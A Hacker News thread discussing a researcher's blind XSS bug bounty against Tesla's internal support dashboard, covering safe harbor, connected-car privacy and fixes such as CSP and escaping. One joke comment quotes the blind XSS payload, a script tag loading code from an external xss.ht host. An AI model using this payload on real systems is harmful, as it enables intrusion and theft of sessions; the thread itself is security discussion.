
Cracking My Windshield and Earning $10k on the Tesla Bug Bounty Program - EdOverflow
https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
======
jxcl
This bug probably existed because some developer thought "this is an internal
application, I don't need to apply the same rigorous input/(edit: and output,
as replies point out) sanitation as I do with normal sites because it's only
accessible by VPN."

As a consultant that gets to see a lot of "internal only" applications, this
is one of the misconceptions that me and my coworkers try to fight against.
XSS is effective even if the attacker doesn't have access to the internal
application, because it's not the attacker's computer making the requests.

~~~
gwbas1c
Could just be because the application was written by a less experienced
programmer, or even outsourced?

~~~
disillusioned
Tesla and SpaceX are both pretty maniacal about not outsourcing programming,
to my knowledge.

~~~
rconti
Interesting. Obviously they view it as a core competency. This would seem like
a non-obvious and unnecessary expense to many, but (on the Tesla side)
differentiates them from other automakers. Whether that results in a barrier
to competition... we'll see.

~~~
spiralx
Although if you believe these anecdotes from a supposed ex-employee then
competency is not the word to use:

[https://twitter.com/atomicthumbs/status/1032939617404645376](https://twitter.com/atomicthumbs/status/1032939617404645376)

------
inlined
> On a final note, Tesla’s bug bounty program is fantastic. They provide a
> safe haven for researchers who are in good-faith trying to hack their cars.
> If you accidentally brick one, they’ll even offer support in attempting to
> fix it.

This is an amazingly open and refreshing policy!

~~~
hanniabu
Does this mean you can legally mod your car under the guise of hacking it?

~~~
whatshisface
It's not illegal to have a NO2 factory in your garage, it's illegal to drive
it on the roads. A good-faith emissions control hacking would probably not
involve long-distance highway driving or racing.

~~~
hanniabu
I was thinking you wouldn't have to tell Tesla this, but it's a good point
because the car is connected so they would know if you were driving it or not.

------
gibolt
What a great response and turnaround. Bug as fixed within 24 hours and paid
out within a month.

I wouldn't expect any other car manufacturer to respond ever, most don't even
own their software stack.

~~~
Someone1234
A lot of other vehicle manufacturers couldn't anyway, they don't build the
infotainment systems in-house, they simply just re-theme/re-badge the units
from companies like Panasonic, Pioneer, Fujitsu-Ten, etc.

So if they got a bug report it would have to travel through ten layers of
indirection before an engineer got to read it (let alone understand/respond).
Particularly when there might be two or three different written word languages
used between consumer and engineer (e.g. English -> Japanese -> Mandarin
(Taiwan)).

Tesla (and Ford previously) were actually oddballs in that they didn't use
"off the shelf" infotainment units.

~~~
gambiting
I've tried reporting a bug where on a 2016 Mercedes GLA if you're playing MP3s
from a USB stick the car will remember the track to play but nothing else
about it, so after coming back the same track plays but with the wrong name,
wrong album art, etc etc. It's literally impossible to. The dealer said they
have no way to do that except for just flashing my car with a newer FW and
hoping it fixes it(it didn't), messaging Mercedes UK yields no reply, posting
on their official forums yields no reply.....I just gave up after a while.

------
simonebrunozzi
We should always, always plaude and praise companies that are at least this
serious about bounty programs.

Two years ago, despite I wouldn't call myself the deepest technical person on
the planet, I found a terrible bug that exposed 1.1M records for a bay area
startup. (edit: the bug was really easy to find, it was a form of URL
injection. I couldn't even believe that bug was there in the first place).

I reached out to them multiple times, only to realize they were going to
ignore me in perpetuity. I didn't even want money, I would have been happy
just to see the bug fixed. (I never helped fix a bug that another company
had). Nada.

A less scrupulous person would have sold that information and exposed data for
1.1M people.

I am not naming the company here, even though they would totally deserve it.

~~~
deckar01
I once reverse engineered a Gmail worm found in the wild. The underlying
exploit ended up being a security scan bypass in Google docs. I spent a lot of
time submitting a bounty report, but I made one fatal mistake: I used URL
redirection in the PoC. It was automatically rejected even though that was an
example of content that the scan normally detects, not the actual
vulnerability. It was closed as not eligible, then silently fixed a week
later.

Edit: I checked the emails to refresh my memory. A human acknowledged that it
was a flaw in the security scanner and forwarded it to the drive team, then a
bot (AFAICT) determined that it was not eligible based on metadata in the
report.

Edit 2: I did get one thing out of it. They sent me an invitation to a Bounty
Craft event in Las Vegas during Def Con which I was attending that year
(likely the actions of another bot scraping the email list). I got there early
and accidentally sat down in the Microsoft Security Response team's couch area
while they were all up getting food. They were nice people. They realized I
never picked up swag on the way in and someone took me back to the door to get
it. Apparently since I was with one of the event organizer and they said "you
forgot to give him a t-shirt" they assumed I was staff and gave me a staff
t-shirt. The event was 100% about how the sponsor companies were investing in
automated fuzzing technologies and basically didn't need bug bounty hunters
anymore. Slap in the face.

~~~
behringer
Apparently google wants you to next time sell it to the highest bidder.

~~~
ajross
I understand the point you're making about incentives, but the phrasing is
poor. The reason people shouldn't sell exploits to the highest bidder isn't
because the vulnerable software author refuses to pay a bounty.

People shouldn't sell exploits because it's a crime that hurts people.

~~~
behringer
In the movie Independence Day the aliens computer systems were hacked with a
few hours worth of work. Why were they hacked and destroyed? Because nobody
reported and worked on security incidents of course. Why would anyone need to
in a militaristic society?

My story is silly, of course, but the point is real. If you don't attack and
then fix systems, a lot of people will get hurt.

~~~
ajross
That's better phrased, indeed. The problem with your earlier statement is that
the incentives are not for the people you are talking about.

You don't offer rewards to prevent criminals from selling exploits. Criminals
are going to sell exploits anyway. Bug bounties have nothing to do with
criminal behavior.

Bounties are there to incentivize the honest people to do security work. And
the response of an honest person being denied a bounty _IS ABSOLUTELY NOT_ to
turn around and sell it.

------
brokenmachine
All the comments on here seem to be praising Tesla for paying a bug bounty,
but I'm just sitting here horrified at how much information a phone support
guy is able to view remotely about owners cars, not to mention the ability to
send OTA updates.

No way am I buying a connected car.

~~~
reallydontask
I think you might be out of options soon, if you want a new car that is. A
while longer for used cars obviously.

Once all new cars are connected, the DuckDuckGo of cars will launch soon
thereafter with the promise of a privacy centric connected car :)

------
AdamN
The real thing you realize here is that Tesla is a software company (and it
will eat the world). Getting a hotfix out that fast is the proof in the
pudding.

------
Johnny555
Interestingly, the car returned the (current?) speed:

Speed: 81 mph

I wonder if that, coupled with the GPS info (which wasn't included in the data
returned, but I assume the car knows it) would be sufficient to issue a
speeding ticket if the government had access to the data?

~~~
samirm
But how would they know who to ticket? Just because your car is moving,
doesn't mean you're the one driving it. If they cannot prove who was operating
the vehicle at the time of infraction, they cannot issue a ticket.

~~~
tashoecraft
That's not true, red light cameras have no problem issuing fines to the
vehicle owner.

~~~
Faaak
Yes, but they take a picture of the car.

What if you car is being toed by a speeding truck (or on a trailer) ?

~~~
Qwertystop
Then you could dispute the ticket, and presumably the fact that it's being
towed would be visible in the photo.

------
tlrobinson
I can imagine the support call:

> Did you really name your Tesla "><script src=//zlz.xss.ht></script>?

> Oh, yes, little Bobby ScriptSrc, we call him.

------
komali2
I mentioned this to my coworkers who brought up something I hadn't thought of
- would this be illegal in the USA via something such as CFAA?
[https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act](https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act)
He technically accessed Tesla's dashboard without authorization, for example.

~~~
EdOverflow
(Obligatory: I am not a lawyer)

This is what the "safe harbor" that the author was referring to is supposed to
cover.

> Tesla considers that a pre-approved, good-faith security researcher who
> complies with this policy to access a computer on a research-registered
> vehicle has not accessed a computer without authorization or exceeded
> authorized access under the Computer Fraud and Abuse Act ("CFAA"). [1]

*.teslamotors.com, which is where the blind XSS payload fired, is in scope and therefore the safe harbor covers that asset too. For more on bug bounty safe harbors, I would highly recommend taking a look at Amit Elazari's work at [https://amitelazari.com/%23legalbugbounty-hof](https://amitelazari.com/%23legalbugbounty-hof) and [https://github.com/edoverflow/legal-bug-bounty](https://github.com/edoverflow/legal-bug-bounty).

[1]: [https://bugcrowd.com/tesla](https://bugcrowd.com/tesla)

------
jcampbell1
The trend of storing auth tokens in localStorage rather than httpOnly cookies
is a problematic trend due to vulnerabilities like this. If you can exfiltrate
an authtoken then one gets long lived access to the system.

------
Zenst
That's impressive, a support process that is responsive, don't mess about and
fair. Companies around the World could learn something from this. They
probably won't, but they certainly all could.

------
j0e1
Tangentially, how long did it take to get the windshield fixed? I've heard
horror stories about their service.

~~~
zlz123
I'm yet to fix it because the crack isn't too bad yet. Their windshield
replacement is through retailers who fit their standards and not Tesla
directly so I assume it won't be too bad as all they have to do is ship the
wind screen.

------
nickip
What would the fix for this be? Enabling CORS only for
`[https://garage.vn.teslamotors.com`](https://garage.vn.teslamotors.com`)?

~~~
bzbarsky
CORS won't do it, because it protects the response target, not the response
source.

CSP would do the trick, though.

The other fix is properly escaping things before sticking them in your markup.

~~~
runeks
> The other fix is properly escaping things before sticking them in your
> markup.

Or simply not displaying user data using a markup language with built-in
remote code execution.

~~~
bzbarsky
Well, yes, there are various levels of "thinking outside the box" here that
could be applied.

------
samnwa
That was an awesome summary and a good example of the value of bug bounty
programs.

------
driverdan
This is a great example of why it's terrible to have a car that can be remote
controlled including the ability to push arbitrary updates. It should not be
possible to use XSS to compromise a vehicle.

~~~
trilila
Following this logic, nothing should be remotely controlled because there
might be security risks. Including OS updates to laptops.

~~~
driverdan
Correct. No one should be able to push out arbitrary code without explicit
user approval.

~~~
SquareWheel
Users have a terrible habit of not running updates. Years of botnets suggest
that automatic updates are probably the way to go.

------
benj111
I share my birthday with a car. I'm unsure how to feel about this, probably
better than sharing it with Rupert Murdoch, but worse than sharing it with
Douglas Adams.

------
redpilldealer
Nice to see Sam reached the front page of hacker news!

